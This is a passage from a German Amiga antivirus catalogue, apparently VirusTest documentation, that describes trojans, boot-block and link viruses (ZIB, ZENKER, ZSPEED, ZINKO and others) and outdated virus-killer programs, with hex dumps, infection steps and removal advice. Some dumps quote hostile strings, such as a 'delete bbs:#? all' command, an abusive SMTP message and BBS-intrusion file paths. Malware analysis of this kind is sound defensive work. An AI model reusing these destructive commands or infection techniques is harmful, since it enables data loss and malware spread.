  7931.           somewhere around 7000 Dkr. I hope all you fucknuts learned a
  7932.           lesson. From v3.6 and forward I will remove this behaviour.
  7933.           Peace out!
  7934.           . martin . kozmiq . wulffeld@post4.tele.dk
  7935.           . see ya at roskilde'98
  7936.         Meine Anmerkung:
  7937.           Ich halte die Vorgehensweise fuer verantwortungslos und
  7938.           rechtlich SEHR bedenklich. Ich denke, der Programmierer
  7939.           hat sich und seinem Programm einen sehr grossen Baerendienst
  7940.           erwiesen. Das Vertrauen der User duerfte dahin sein.
  7941.         Nachtrag 97-07-09:
  7942.           Auszug aus Xtruder V3.6:
  7943.           4e004c3a 58747275 6465722e 6b657900 N.L:Xtruder.key.
  7944.           58747275 6465722e 6b657900 610001ac Xtruder.key.a...
  7945.           Es hat im AmyNet-Vir (nicht aminet) mehrere Rechtfertigungs-
  7946.           versuche des Programmierers gegeben. Anscheinend hat er seine
  7947.           Meinung geaendert und den Zerstoerungsteil aus V3.6 wieder
  7948.           entfernt. Ob er dadurch das Vertrauen zu sich und seinem
  7949.           Programm zurueckgewinnt, mag jeder User fuer sich selbst
  7950.           entscheiden. Es gibt ein Sprichwort: Wer einmal ....
  7951.         Nachtrag 97-07-27:
  7952.           Es tauchen in letzter Zeit immer wieder Meldungen in Amiga-Netzen
  7953.           auf, die falsche Xtruder-Versions-Nummern (z.B. 3.6) enthalten
  7954.           und auf Viruseigenschaften hinweisen. Diese Aussagen sind
  7955.           FALSCH !!!!!  Es handelt sich NICHT um ein Virus-Teil, sondern um
  7956.           ein Trojan-Teil, da KEINE Vermehrung stattfindet. Die Zerstoerungs-
  7957.           routine wurde NUR (!!!!) in V3.5 gefunden. In V3.4, V3.6 habe ich
  7958.           diese Routine NICHT gefunden !!!!!
  7959.  
  7960.  
  7961.    - YAMmsg.2-Trojan      Zerstoerung
  7962.         bekannter Filename: YAM.msg.2
  7963.         Namensbegruendung: Filename uebernommen
  7964.         Filelaenge:  #216296 Bytes
  7965.         Nicht Resetfest
  7966.         Keine verbogenen Vektoren
  7967.         Ablauf:
  7968.         Das Programm beendet sich bei mir mit einem Requester
  7969.         "Illegal Instruction"
  7970.         In Wirklichkeit wurde ein neues loadwb-File geschrieben.
  7971.         Name: lOAdwB  Laenge: 40544
  7972.         Im File ist zu lesen:
  7973.             45523a20 6c6f6164 77622033 392e3920 ER: loadwb 39.9
  7974.             2833302e 30332e39 3529266d 80102f0b (30.03.95)&m../.
  7975.         Dieses File enthaelt wieder zwei Files zum Schreiben UND
  7976.         ausfuehren:
  7977.          - Orig-Loadwb  Laenge: 1136 Bytes
  7978.          - Format       Laenge gepackt:  9312 Bytes
  7979.                         Laenge entpackt: 13368 Bytes
  7980.         VT bietet nur loeschen an.
  7981.  
  7982.    - Z.E.S.T  BB    LADS-Clone  s.o
  7983.          Aenderung: lesbarer Text, kein TaeuschAlert, verschluesselter
  7984.          Text ist gleich  (Anfaenger)
  7985.          lesbarer Text: Z.E.S.T is the B.E.S.T Virus-Killer usw.
  7986.  
  7987.    - ZACCESS V1.0    16Bit-Clone   s.o.
  7988.          nur Text geaendert
  7989.  
  7990.    - ZACCESS V2.0    Forpib-Clone  s.o.
  7991.          nur Text geaendert
  7992.  
  7993.    - ZACCESS V3.0    Extreme-Clone s.o.
  7994.          nur Text geaendert
  7995.  
  7996.    - zakapior-Fake
  7997.          Bekannte Filenamen:   waren kurz im Aminet
  7998.             cmq060      v1.5     1104 Bytes 
  7999.             cmq060move16         1080 Bytes
  8000.             fastiprefs  v40.37  17428 Bytes
  8001.             poolmem     v1.45    7672 Bytes
  8002.          Name: nach process
  8003.          Keine Vermehrung
  8004.          Empfehlung: File loeschen und sauberes File neu aufspielen. 
  8005.          Alle Files liegen wieder "sauber" im Aminet (Stand: Aug.99)
  8006.          Ablauf: Ein neuer Process = zakapior. Es sollen Emails ver-
  8007.               schickt werden.
  8008.          Decodiert mit EOR.w ist in den Files zu lesen:
  8009.              62736473 6f636b65 742e6c69 62726172 bsdsocket.librar
  8010.              79001002 0019c38f 38460000 00000000 y.......8F......
  8011.              00010000 001e4845 4c4f0a00 4d41494c ......HELO..MAIL
  8012.              2046524f 4d3a203c 583e0a00 52435054  FROM: <X>..RCPT
  8013.              20544f3a 203c7072 65736964 656e7440  TO: <president@
  8014.              616d6967 612e636f 6d3e0a00 44415441 amiga.com>..DATA
  8015.              0a004672 6f6d3a20 416d6967 61204c6f ..From: Amiga Lo
  8016.              76657220 3c3e0a00 5375626a 6563743a ver <>..Subject:
  8017.              2046494c 54485920 43554e54 210a0a00  FILTHY CUNT!...
  8018.              4655434b 2055204e 415a4920 43554e54 FUCK U NAZI CUNT
  8019.              202d2044 49452041 4e442042 55524e20  - DIE AND BURN
  8020.              494e2048 454c4c20 414d4947 41204b49 IN HELL AMIGA KI
  8021.              4c4c494e 47205748 4f524521 0a000a0a LLING WHORE!....
  8022.              2e0a0051 5549540a 00008000 03eb0000 ...QUIT.........
  8023.              00008000 03f40000 00000000 00007a61 ..............za
  8024.              6b617069 6f720000                   kapior..
  8025.          Nachtrag Aug.99: Es soll ein Prg geben, das die Fake-Teile
  8026.          abschaltet. Meine Empfehlung um Verwirrung zu vermeiden:
  8027.          Spielen sie bitte die sauberen Files neu auf. Danke
  8028.  
  8029.    - ZAPA_B.Door   Filename DM-Trash
  8030.          Laenge gepackt:  4764   VT erkennt P-Packer
  8031.          Laenge entpackt: 7636   VT erkennt ZAPA
  8032.              gegen AmiExpress ???
  8033.          dm-tr.lha 5135 Bytes  entpackt: dm-trash 4764 Bytes
  8034.          folgender Text (doc) ist zur Taeuschung enthalten:
  8035.          New virus ...caused by the new FIXED (?) Version
  8036.          of DMS 1.11 Turbo!
  8037.          It is some kind of linkvirus and uses Devices
  8038.          like DH0:, LIBS:, and BBS: (!!) usw.
  8039.  
  8040.          Eigene Versuche mit FangFiles (habe AmiExpress nicht) haben
  8041.          ergeben, dass eben von dm-trash folgende Files veraendert wer-
  8042.          den:  bbs:config1  bbs:user.data  bbs:user.key 
  8043.          Die Files wurden verlaengert und ZAPA eingetragen.
  8044.          dm-trash. Vermutlich soll ein Superlevel fuer einen Boxzu-
  8045.          gang geschaffen werden. Also fuer normale Amiga-User kein
  8046.          Problem.
  8047.          VT bietet loeschen an.
  8048.  
  8049.    - ZENKER-Virus   BB  KS2.04: ja  im Speicher immer ab $7F800
  8050.          Cool $7F86c DoIo $7F894
  8051.          Fordert trackdisk.device NICHT
  8052.          Versucht im BB durch lesbaren Text zu taeuschen:
  8053.               Commodore Bootloader (20 Oct 1987)
  8054.          Dieser BB holt in Wirklichkeit ab $70000 auf Speichermedium (bei
  8055.          Disk Zyl 40 Sektor 16-19) 4 Bloecke. Die ersten beiden Bloecke
  8056.          enthalten das Virusteil. Die restlichen beiden Bloecke enthalten
  8057.          den ehemaligen Original-BB. Dabei wurde ab der DOS-Kennung
  8058.          == ZENKER == eingetragen. Dies behindert die Vermehrung nicht,
  8059.          da das Virusteil erst ab $C in den Original-BB einspringt.
  8060.          Das Virusteil meldet sich NICHT.
  8061.          Vermehrung und Schaeden:
  8062.          Der Original-BB der eingelegten Disk wird nach $7FC00 geholt,
  8063.          == Zenker == eingetragen und dann mit dem Virus-Teil nach Zyl 40
  8064.          Sektor 16 ff. abgespeichert. File-Bloecke an dieser Stelle oder
  8065.          die BitMap (im Test passiert) werden ueberschrieben und koennen
  8066.          NICHT gerettet werden !! Tut mir leid. Danach wird der Bootloader
  8067.          in den BB geschrieben.
  8068.          Falls der BB-loader erkannt wurde, sollte das Gadget O-BB aktiviert
  8069.          werden. Sie koennen damit versuchen, den Original-BB von Zyl 40
  8070.          zu holen. VT schreibt dann die Dos0-Kennung und $370 neu. Danach
  8071.          wird die BB-CheckSum neu berechnet. Diesen BB koennen sie dann mit
  8072.          Speicher-BB zurueckschreiben oder im File-Req abspeichern.
  8073.          Vielleicht haben Sie Glueck und ihre Disk bootet wieder. Der
  8074.          Fehler auf Zyl 40 kann aber NICHT behoben werden.
  8075.          Auf Festplatte arbeiten Sie bitte so NICHT. Holen Sie das Backup
  8076.          des Rigid-Bereichs hervor (das haben Sie doch oder ???) und
  8077.          schreiben Sie den Rigid-Bereich mit ihrer Kontroller-Software
  8078.          (ist mir lieber so) oder wenn es gar nicht anders geht mit VT-
  8079.          Restore zurueck.
  8080.          Erkennung und Loeschung mit VT2.51 getestet:
  8081.          Speicher        19.03.93
  8082.          BB              19.03.93
  8083.          BlockITest      19.03.93
  8084.          BlockKette      19.03.93
  8085.          hole O-BB       21.03.93
  8086.          Hinweis 25.10.93: Das VirusTeil verseucht auch FFS-Disketten.
  8087.          Da aber immer ein DOS0-BB geschrieben wird (ist ausgetestet),
  8088.          wird beim naechsten Schreibzugriff (z.B. copy File) die Disk-
  8089.          Struktur noch weiter zerstoert.
  8090.  
  8091.  
  8092.    - ZIB-Inst.      Installer
  8093.          ab KS2.04: ja
  8094.          Verbogener Vektor: LoadSeg
  8095.          Resetfest: Nein
  8096.          Filename: z.B. loadwb
  8097.          Virusteillaenge: #1264 Bytes (also 4 Bytes mehr als ZIB-Virus)
  8098.          Link hinter den ersten Hunk.
  8099.          Speicherverankerung und Vermehrungsbedingungen:
  8100.            - siehe bei ZIB-Virus
  8101.            - es wird an die Files dann das ZIB-Virus (1260) gelinkt.
  8102.          Sprung aus loadwb in das Linkteil (auch mehrfach):
  8103.            - move 4.w,a6 (4 Bytes) wird zu bsr.w Linkteilstart  (6100wxyz)
  8104.            - move.l 4,a6 (6 Bytes) wird zu bsr.w Linkteilstart + 1 NOP
  8105.                - Looptiefe $7FFF
  8106.            - RTS wird zu bra.s Linkteilstart+4  (60yz)
  8107.                - Looptiefe $7B + 4
  8108.            (also anderer Vorgang als ZIB-Virus)
  8109.          VT versucht das Linkteil aus loadwb auszubauen.
  8110.                   
  8111.  
  8112.    - ZIB-Inst.-Inst.      Installer fuer loadwb
  8113.          Filename: z.B. spatch
  8114.          Virusteillaenge: #2080 Bytes
  8115.          Link hinter den ersten Hunk.   
  8116.          Decodiert (mit $85 und $BEEF) ist im Linkteil zu lesen: 
  8117.                                          496e               In
  8118.           7374616c 6c657220 76312e33 20627920 staller v1.3 by
  8119.           556e6974 65642046 6f726365 5320a931 United ForceS .1
  8120.           39393600 633a6c6f 61647762 0000646f 996.c:loadwb..do
  8121.           732e6c69 62726172 79000000          s.library...
  8122.          Sprung aus spatch in das Linkteil (auch mehrfach):
  8123.            - move 4.w,a6 (4 Bytes) wird zu bsr.w Linkteilstart  (6100wxyz)
  8124.            - move.l 4,a6 (6 Bytes) wird zu bsr.w Linkteilstart + 1 NOP
  8125.                - Looptiefe $7FFF
  8126.            - RTS wird zu bra.s Linkteilstart+4  (60yz)
  8127.                - Looptiefe $7B + 4  
  8128.              (also anderer Vorgang als ZIB-Virus)
  8129.          Vermehrungsbedingungen:
  8130.            - c:loadwb wird gefunden  (also SEHR gefaehrlich)
  8131.            - Medium validated
  8132.            - mind. #10 Block frei
  8133.            - usw.
  8134.            - Linkverlaengerung von loadwb um #1264 Bytes (also 4 Bytes
  8135.              mehr als ZIB-Virus)
  8136.          VT versucht das Linkteil aus spatch auszubauen.
  8137.  
  8138.  
  8139.    - ZIB-Virus      File  Link
  8140.          ab KS2.04: ja (cacheclear)
  8141.          Verbogener Vektor: LoadSeg
  8142.          Resetfest: Nein
  8143.          Fileverlaengerung: 1260 Bytes
  8144.          Link hinter den ersten Hunk.
  8145.          Decodiert (mit $BABE) ist im Linkteil zu lesen:
  8146.             0003b090 4e757877 fdfc646f 732e6c69 ....Nuxw..dos.li
  8147.             62726172 79006273 64736f63 6b65742e brary.bsdsocket.
  8148.             6c696272 61727900 533a5a49 42006c69 library.S:ZIB.li
  8149.          Speicherverankerung:
  8150.            - LastAlert wird auf "TRSi" geaendert
  8151.            - LoadSeg wird verbogen
  8152.            - neuer Prozess wird erzeugt  Name: ZIB
  8153.            - Es wird nach bsdsocket.library gesucht und falls vorhanden
  8154.              veraendert. Diese Lib liegt nicht in Libs,sondern wird von
  8155.              einigen Programmen (z.B. Miami) im Programm mitgefuehrt. Diese
  8156.              Lib wird immer nach Programmende (Miami) wieder aus dem
  8157.              Speicher entfernt, auch wenn Veraenderungen vorgenommen waren.
  8158.              (So war es auf meinem Testrechner).
  8159.          Vermehrungsbedingungen:
  8160.            - File ausfuehrbar ($3F3)
  8161.            - max. Filelaenge #125000 Bytes
  8162.            - min. Filelaenge keine Untergrenze gefunden
  8163.            - 3E9-Hunk wird gefunden
  8164.            - Medium validated
  8165.            - mind. 5 Block frei
  8166.            - RTS wird gefunden  ( max. loop $3E+1 )
  8167.            - RTS wird ersetzt durch bra.s oder NOP (falls RTS genau
  8168.              am Ende des ersten Originalhunks). Auch mehrere RTS
  8169.            - Versucht FileDate zu retten
  8170.            - Veraendert Word von Protection-LW 
  8171.          Falls bsdsocket.lib im Speicher, dann versucht der ZIB-Process
  8172.          ueber das Modem eine Nachricht abzuschicken.  
  8173.          VT versucht Loadseg im Speicher zurueckzusetzen.
  8174.          VT versucht das Linkteil aus einem File auszubauen.
  8175.          VT versucht den ZIB-Process aus dem Speicher zu entfernen.
  8176.          Besser waere aber ein Booten von einer sauberen Disk.
  8177.  
  8178.    - ZINE-Disk-Val. (L)  File
  8179.          anderer moeglicher Name: DEVIL-ZINE
  8180.          Fundort z.B: CD-LSD2:A/LEISURE/DISKMAGS/ZINE10.DMS
  8181.          Dringende Empfehlung: Loeschen
  8182.          Laenge: 1848 Bytes
  8183.          KEINE Verbogenen Vektoren
  8184.          NUR Bis KS1.3 einschl.
  8185.          Decodiert mit  eori.b #$27,(A1)+  ist im File zu lesen:
  8186.              20202020 20202020 20000941 46545343          ..AFTSC
  8187.              4e550000 5a494e45 31303a2e 66617374 NU..ZINE10:.fast
  8188.              64697200 20202020 20202020 20202020 dir.
  8189.              20202020 20202020 20202020 20202000                .
  8190.              46696c65 20537973 74656d00 00000000 File System.....
  8191.              536e6f6f 70446f73 00000000 000003f2 SnoopDos........
  8192.          Da die Routinen sehr kurz sind, sind danach noch Teile des
  8193.          Original-Disk-Validators zu finden, die aber NICHT erreicht
  8194.          werden.
  8195.          Ablauf:
  8196.          Test auf SnoopDos im Speicher
  8197.          Ja = Ende
  8198.          Nein Eor-Operation
  8199.          Danach soll LoadSeg ZINE10:.fastdir ausgefuehrt werden.
  8200.          CreateProc : Name FileSystem
  8201.  
  8202.    - ZINE-fastdir (L)  File
  8203.          Dringende Empfehlung: Loeschen
  8204.          Laenge: 840 Bytes
  8205.          Liegt bei der Disk im Root-Verzeichnis
  8206.          KEINE verbogenen Vektoren
  8207.          KEINE Vermehrung
  8208.          Die Ursprungsfunktion von .fastdir wird nicht erfuellt.
  8209.          Fundort: CD-LSD2:A/LEISURE/DISKMAGS/ZINE10.DMS
  8210.          Decodiert mit  eori.b #$27,(a1)+  ist im File zu lesen: 
  8211.              5a494e45 31303a63 2f2e6661 73746469 ZINE10:c/.fastdi
  8212.              72002020 20202020 20202020 20202020 r.
  8213.              20202020 20202020 20202020 20200000               ..
  8214.              74726163 6b646973 6b2e6465 76696365 trackdisk.device
  8215.          Da dieses File automatisch aktiviert wird, wenn der Disk-Val.
  8216.          unter KS1.3 gebraucht wird, wird zuerst das BitMapFlag auf
  8217.          #$FFFFFFFF gesetzt.
  8218.          Danach werden #$400 Bytes ueber das trackdisk.device nach
  8219.          #$6e000 (nur bei DD-disk=RootBlock) geschrieben.
  8220.          Danach wird die eor-Operation ausgefuehrt.
  8221.          Aufruf von DosExecute ZINE10:c/.fastdir
  8222.          Dieses Mal also ein fastdir in c .
  8223.  
  8224.    - ZINE-fastdir.BBS   File
  8225.          VT bietet NUR Loeschen an.
  8226.          Laenge gepackt:  9800 Bytes
  8227.          Laenge entpackt: 16696 Bytes
  8228.          KEINE verbogenen Vektoren
  8229.          KEINE Vermehrung
  8230.          Die Ursprungsfunktion von .fastdir wird nicht erfuellt.
  8231.          Fundort: CD-LSD2:A/LEISURE/DISKMAGS/ZINE10.DMS
  8232.          Entpackt ist am Fileanfang zu lesen:
  8233.             000003e9 00000b1b 4efa110a 42425300 ........N...BBS.
  8234.             44483000 44483100 4844303a 00484431 DH0.DH1.HD0:.HD1
  8235.             3a004448 30004448 31004844 30004844 :.DH0.DH1.HD0.HD
  8236.             31004242 533a0044 48303a42 42532f00 1.BBS:.DH0:BBS/.
  8237.             4448313a 4242532f 00484430 3a424253 DH1:BBS/.HD0:BBS
  8238.             2f004844 313a4242 532f0044 48303a00 /.HD1:BBS/.DH0:.
  8239.             4448313a 00484430 3a004844 313a0000 DH1:.HD0:.HD1:..
  8240.          Es duerfte sich also um den Versuch handeln, Manipulationen
  8241.          in einer Mailbox vorzunehmen. Ob die Kette vom falschen Disk-
  8242.          Validator ueber root:.fastdir zu c/.fastdir komplett arbeitet,
  8243.          habe ich nicht nachvollzogen, da ich keine BBS fahre.
  8244.          Lesen Sie bitte auch nach bei: Devil_11_B.Door
  8245.  
  8246.    - ZINKO  Trojan      Zerstoerung
  8247.          Filename vielleicht: FlowerPower.exe  L: 166992 Bytes
  8248.          VT bietet nur Loeschen an
  8249.          Vergleiche auch: VoxelSvind-Trojan
  8250.          Ablauf:
  8251.          Es wird ein Bild gezeigt:
  8252.          Dunkler breiter Diagonalbalken mit heller Schrift
  8253.              Iris presents
  8254.          Mit dem Text kann ich nichts anfangen. In Wirklichkeit
  8255.          werden auf sys: Veraenderungen vorgenommen.
  8256.          Schaden:
  8257.          An Files wird hinter 3F2 ein Textteil angehaengt mit
  8258.          variabler Laenge:
  8259.             000003f2 5a494e4b 4f204d41 44452054 ....ZINKO MADE T
  8260.             48495321 20492052 554c4521 20484148 HIS! I RULE! HAH
  8261.             41484148 41484148 4121204e 4f525448 AHAHAHAHA! NORTH
  8262.             45524e20 50414c41 43453a20 2b343520 ERN PALACE: +45
  8263.             35383530 20363038 31005a49 4e4b4f20 5850 6081.ZINKO
  8264.          Verzeichnisse vorher:
  8265.            s/startup-sequence
  8266.                    7  13-09-95
  8267.            devs/parallel.device
  8268.                 1812  13-09-95
  8269.            devs/printer.device
  8270.                26964  13-09-95
  8271.            devs/printers/Nec
  8272.                 6732  13-09-95
  8273.            devs/system-configuration
  8274.                  232  13-09-95
  8275.          Verzeichnisse nachher:
  8276.            s/000000000111000110100001110011
  8277.                18150  20-12-96
  8278.            s/000000000110110100100111100000
  8279.                 6528  20-12-96
  8280.            s/000000000110110011001101100100
  8281.                 2554  20-12-96
  8282.            devs/000000000011000100101100111111
  8283.                  147  20-12-96
  8284.            devs/000000000111010100001100000011
  8285.                19202  20-12-96
  8286.            devs/000000001000100100010100010111
  8287.                 3038  20-12-96
  8288.          Es werden also nicht nur die Namen geaendert und Text an-
  8289.          gehaengt, sondern auch zwischen den Dirs hin und her kopiert.
  8290.          z.B. Keines der Files im veraenderten s-Dir ist die startup-
  8291.          sequence. Ich sehe hier keine Rettungsmoeglichkeit mit einem
  8292.          vernuenftigen Zeitaufwand. Sie koennen zwar leicht mit einem
  8293.          Filemonitor den Text abschneiden, aber nicht in jedem File
  8294.          ist ein ASCII-String, durch den Sie den Filenamen zuordnen
  8295.          koennen. Tut mir leid.
  8296.  
  8297.    - ZOMBI I-Virus   Cool, im Prg DoIo, immer ab $7A000
  8298.          fordert trackdisk.device NICHT
  8299.          Vermehrung: BB
  8300.          Schaeden:
  8301.          Sobald die Zaehlzelle den Wert $F erreicht hat:
  8302.          - RootBlock und Bitmapblock neu schreiben !!!!
  8303.          - Name der Disk dann: Zombi I
  8304.          - Textausgabe mit DisplayAlert
  8305.             Text wird decodiert nach $70000 mit eori.l #$AAAAAAAA,(A0)+
  8306.                >>>>>    Hello AMIGA User !!!!!    <<<<<
  8307.                            HERE IS ZOMBI I
  8308.                    If you want to clean your Disks
  8309.                     use Zombie I without risks !
  8310.  
  8311.          Da der BitMapBlock immer nach $371 geschrieben wird, was aber
  8312.          im DOS nicht zwingend festgelegt ist, kann ein File, das beim
  8313.          Block $371 beginnt, zerstoert werden. Alle Hashwerte im Root-
  8314.          Block werden auf Null gesetzt. Beim BitMapTest erkennen Sie
  8315.          diese Disk am Namen Zombi I ab $1B0.
  8316.          Rettung: DiskSalv aufrufen.
  8317.  
  8318.    - ZonderKommando 1  File   (Name nachvollziehbar)
  8319.          anderer Name: Mongo09  s.o.
  8320.          bekanntes File: mongo09.exe 
  8321.          Gegen BBS gerichtet.      
  8322.          Laenge gepackt : 1708 Bytes
  8323.          Laenge entpackt: 3368 Bytes
  8324.          Keine verbogenen Vektoren:
  8325.          Keine Vermehrung als Einbruchswerkzeug.
  8326.          Sucht nach Snoopdos    Falls ja Ende
  8327.          Sucht nach ACP.STARTUP Falls nein Ende
  8328.          Legt File FLT_DSQ.DMS an (Das Hackfile=Daten ist codiert)
  8329.          VT bietet loeschen an.
  8330.          Fileauszug aus entpacktem File:     
  8331.            4eaefeda 4a806730 4cdf7fff 4e755a6f N...J.g0L..NuZo
  8332.            6e646572 204b6f6d 6d616e64 6f203230 nder Kommando 20
  8333.            3038202d 20546865 204e6577 2047656e 08 - The New Gen
  8334.                  ;.....
  8335.            51c8fffa 4e750000 00000000 533a4143 Q...Nu......S:AC
  8336.            502e5354 41525455 50000000 00000000 P.STARTUP.......
  8337.                  ;.....
  8338.            00000000 00000000 0000434f 4e465f4c ..........CONF_L
  8339.            4f43414c 2030322d 0075706c 6f61642f OCAL 02-.upload/
  8340.            464c545f 4453512e 444d5300 75736572 FLT_DSQ.DMS.user
  8341.            2e646174 61004242 535f4c4f 43415449 .data.BBS_LOCATI
  8342.            4f4e2000 00000000 00000000 00000000 ON .............
  8343.                  ;.....
  8344.            00006262 733a636f 6e666967 30000000 ..bbs:config0...
  8345.                  ;.....
  8346.            00000000 00000000 536e6f6f 70446f73 ........SnoopDos
  8347.  
  8348.    - ZonderKommando 2  File   (Name nicht nachvollziehbar aber ueber-
  8349.          nommen)
  8350.          anderer Name: Mongo51  s.o.
  8351.          Bekannte Files: mongo51.exe
  8352.          Laenge gepackt : 1464 Bytes
  8353.          Laenge entpackt: 2268 Bytes
  8354.          Keine verbogenen Vektoren:
  8355.                          trsi-znt.exe
  8356.          Laenge gepackt : 21784 Bytes
  8357.          Laenge entpackt: 184552 Bytes
  8358.          Gegen BBS gerichtet
  8359.          Keine Vermehrung als Einbruchswerkzeug.
  8360.          Sucht nach Snoopdos    Falls ja Ende
  8361.          Sucht nach Port ServerRP0  Falls nein Ende
  8362.          Sucht nach ACP.STARTUP Falls nein Ende
  8363.          Legt File ATX_NADA.DMS an (Passworte ???)
  8364.          VT bietet loeschen an.
  8365.          Fileauszug aus entpacktem File:
  8366.            000751c8 fffa4e75 00000000 533a4143 ..Q...Nu....S:AC
  8367.            502e5354 41525455 50000000 00000000 P.STARTUP.......
  8368.                  ;.....
  8369.            00000000 00000000 0000434f 4e465f4c ..........CONF_L
  8370.            4f43414c 2030322d 0075706c 6f61642f OCAL 02-.upload/
  8371.            4154585f 4e414441 2e444d53 00757365 ATX_NADA.DMS.use
  8372.            722e6461 74610042 42535f4c 4f434154 r.data.BBS_LOCAT
  8373.            494f4e20 00000000 00000000 00000000 ION ............
  8374.                  ;.....
  8375.            536e6f6f 70446f73 00536572 76657252 SnoopDos.ServerR
  8376.            50300000 000003ec 0000004f 00000000 P0.........O....
  8377.  
  8378.    - ZSPEED-Virus   File  Laenge ungepackt: 9556
  8379.          gefunden in Archiv: XPRZSPEED.LHA  8703
  8380.          Von der Definition kein Virus, da keine Vermehrung, sondern
  8381.          Zerstoerungs-File gegen AmiExpress (BBS). Also KEINE Gefahr
  8382.          fuer den Normal-User.
  8383.          Empfehlung: einfach loeschen UND s.seq aendern !!!
  8384.            lesbarer Textauszug am Fileende:
  8385.            00000058 0000005A 06060000 5850522D ...X...Z....XPR-
  8386.            53706565 64657220 56332E32 202D2041 Speeder V3.2 - A
  8387.            43544956 45202D20 30343A31 33424253 CTIVE - 04:13BBS
  8388.            64656C65 74652062 62733A23 3F20616C delete bbs:#? al
  8389.            6C626273 3A446970 5F696E5F 44554445 lbbs:Dip_in_DUDE
  8390.            ....
  8391.            4746412D 42415349 43000000 00000000 GFA-BASIC.......
  8392.          Versucht in doc zu taeuschen:
  8393.      This tool was coded in order to improve your Z-Modem transfers.
  8394.      And it works really good in 30 % of our TEST-Downloads there was
  8395.      an acceleration of nearly 6-7 % !!!
  8396.         Fileerkennung mit VT getestet :    08.10.92
  8397.         WICHTIG: wird von VT im Speicher NICHT gefunden !!!!!
  8398.         Deshalb sollten Mailbox-Betreiber ab und zu in  vt/listen/task
  8399.         suchen nach:
  8400.      $003ae000  wait      process     Background CLI [xprzspeedV3.2.exe]
  8401.  
  8402.         Schadensverlauf:
  8403.          - soll mit run gestartet werden
  8404.          - gibt dann im cli aus: XPR-Speeder V3.2 - ACTIVE
  8405.          - oeffnet nur einen Port OHNE Namen
  8406.         (deshalb auch keine Speichererkennung mit VT  vgl. VT/Listen/Port)
  8407.          - wird um 04:13 Uhr (Nacht) aktiviert
  8408.          - delete bbs:#? all
  8409.          - holt delete (zumindest bei mir wird in Sys: danach gesucht)
  8410.          - loescht alle Files in bbs:
  8411.          - loescht ram:temp
  8412.          - legt Dip_in_DUDE neu an
  8413.          - vergroessert dieses File bis die Partition voll ist
  8414.          - dann ein System-Requester bbs voll
  8415.          - dieses File enthaelt bei mir nur Muell und die geloeschten
  8416.            Filenamen
  8417.  
  8418.    - erkannte Virenfinder:
  8419.      =====================
  8420.       teilweise KickRomV1.2, haeufig mit Bootblock-Schreibzugriff,
  8421.       veraltet, resident, werden nach Abfrage geloescht
  8422.  
  8423.       - ABC-VKiller    Empfehlung: sofort loeschen
  8424.             immer ab $7F400, KickTag im Prg. DoIo
  8425.             lila Bildschirm
  8426.             Im BB ist zu lesen:
  8427.            20566972 75734b69 6c6c6572 2f446574  VirusKiller/Det
  8428.            6563746f 72205631 2e303120 20202020 ector V1.01
  8429.            41204142 43205072 6f647563 74696f6e A ABC Production
  8430.  
  8431.       - ACID Terminator V3.0  AntiVirusBB
  8432.             nicht fuer KS2.04 geeignet, da absolute Werte geschrieben
  8433.             werden.
  8434.             Empfehlung deshalb: loeschen
  8435.  
  8436.       - AmigaDOS Viruskiller V2.1 immer ab 7F3F0, resetfest
  8437.             verbiegt DoIo, KickTag, OpenOldLib, und im Prg OpenWindow
  8438.             Schreibt in CLI-Leiste AmigaDOS  Viruskiller 2.1
  8439.             meldet veraenderten Bootblock und bietet BB-AmigaDOS an.
  8440.             GURU mit KS2.04 deshalb Empfehlung loeschen
  8441.  
  8442.       - Anti-Virus_Boot V1.1 c1991 by Hoeppelsoft
  8443.             KickTag, KickMem, KickCheckSum
  8444.             bei Erstinstallierung: gruener Bildschirm
  8445.             bei Reset : Bildschirm mit blauen Streifen
  8446.             eigentlich harmlos, aber:
  8447.             verhindert bei mir mit KS2.04 booten von Festplatte
  8448.             Empfehlung deshalb :   loeschen
  8449.  
  8450.       - ASS VirusProtector V1.0  (KickV1.2, Tonfolge)
  8451.             FastMem ja, KickTag, KickCheckSum, Vec5
  8452.             Soll vor SCA schuetzen. VOELLIG ueberholt. Dringende
  8453.             Empfehlung; Loeschen
  8454.             Lesen Sie bitte auch VTkennt A-K DataLock Installer
  8455.           6e6b7320 746f2074 68652041 53532056 nks to the ASS V
  8456.           49525553 2050524f 54454354 4f522056 IRUS PROTECTOR V
  8457.           312e3020 2a2a2a00 00000000 00000000 1.0 ***.........
  8458.  
  8459.       - Blizzard Protector V1.0
  8460.             testet Cool, Vec3, falls veraendert wird ohne Warnung
  8461.             eigener BB geschrieben (verwendet dazu ueber den verbogenen
  8462.             CoolVector das andere Prg (jsr 82(a0))
  8463.             Empfehlung: loeschen
  8464.  
  8465.       - BlizzPro V3.1    cool, Fastmem ja,
  8466.             im Prg. closedevice (oh, was neues)
  8467.             Vermehrung: ueber BB
  8468.             erkennt einige Viren, schreibt aber KS1.2 DoIo zurueck
  8469.             Meldung ueber DisplayAlert
  8470.             unverschluesselter Text im BB:
  8471.             BlizzPro V3.1  und Virennamen
  8472.  
  8473.       - BlizzPro V3.3     Cool gegenueber BlizzPro V3.1 verschoben
  8474.             NICHT mit KS2.04
  8475.             kein Virus = Bildschirm gruen
  8476.             sonst s.o.
  8477.             unverschluesselter Text im BB:
  8478.             BlizzPro V3.3  und Virennamen
  8479.             Empfehlung: sofort loeschen
  8480.  
  8481.       - CLONK-Virus  DoIo, KickMem, KickTag, KickCheckSum, SumKickData
  8482.             nur 512KB Chip (oder resetfestes 1MB), da zur Aktivierung
  8483.             immer ein Reset ausgefuehrt wird. (7D042 nach $80, TRAP 0)
  8484.             Ursprungsprogramm: Clonk! (Alcatraz)
  8485.             Clone: TAI10-CLONK-Virus s.o.
  8486.  
  8487.       - DISKGUARD v1.0   cool, im Prg DoIo, immer $7FA00
  8488.             Vermehrung: ueber BB
  8489.             Meldung fremder BB.e: mit DisplayAlert
  8490.             schreibt immer  DoIo von KS1.2, Folge: Guru mit KS1.3
  8491.             Empfehlung: loeschen
  8492.  
  8493.       - Exterminator 2   cool, im Prg DoIo
  8494.             FastMem: nein
  8495.             KS2.04:  nein
  8496.             Empfehlung deshalb: L=loeschen
  8497.  
  8498.       - H.C.S I      veraendert cool, im Prg DoIo, loescht KickTag
  8499.                      im Speicher immer ab $7EC00
  8500.                      Vermehrung: jeder DOS-BB ohne Warnung !!!!
  8501.            4F4C4420 482E432E 5320414E 54492D56 OLD H.C.S ANTI-V
  8502.            49525553 202D2048 2E432E53 20273432 IRUS - H.C.S '42
  8503.            3230202A 2A2A0000 00607E2A 2A2A2042 20 ***...`~*** B
  8504.  
  8505.  
  8506.       - H.C.S II  veraendert cool       laenger als HCS1
